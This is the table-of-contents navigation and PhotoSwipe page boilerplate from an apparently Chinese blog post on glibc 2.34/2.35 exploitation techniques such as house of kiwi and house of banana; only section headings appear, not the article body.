			<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Glibc-%E9%AB%98%E7%89%88%E6%9C%AC"><span class="toc-number">1.</span> <span class="toc-text">Glibc     高版本</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80%EF%BC%9A"><span class="toc-number">1.1.</span> <span class="toc-text">前言：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-34-2-35-%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8"><span class="toc-number">1.2.</span> <span class="toc-text">2.34(2.35) 如何利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E5%AF%B9%E6%AF%94"><span class="toc-number">1.2.1.</span> <span class="toc-text">一些对比</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#IO-str-finish"><span class="toc-number">1.2.1.1.</span> <span class="toc-text">_IO_str_finish</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#IO-str-overflow"><span class="toc-number">1.2.1.2.</span> <span class="toc-text">_IO_str_overflow</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#house-of-kiwi"><span class="toc-number">1.2.1.3.</span> <span class="toc-text">house of kiwi</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B0%8F%E7%BB%93%EF%BC%9A"><span class="toc-number">1.2.1.4.</span> <span class="toc-text">小结：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88"><span class="toc-number">1.3.</span> <span class="toc-text">解决方案</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#house-of-banana"><span class="toc-number">1.3.1.</span> <span class="toc-text">house of banana</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#exit-gt-dl-fini-gt-fini-t-array-i"><span class="toc-number">1.3.1.0.1.</span> <span class="toc-text">exit -&gt; _dl_fini -&gt;((fini_t) array[i]) ();</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E6%B3%A8%E6%84%8F%E7%82%B9%EF%BC%9A"><span class="toc-number">1.3.1.0.2.</span> <span class="toc-text">一些注意点：</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="toc-number">1.4.</span> <span class="toc-text">总结：</span></a></li></ol></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
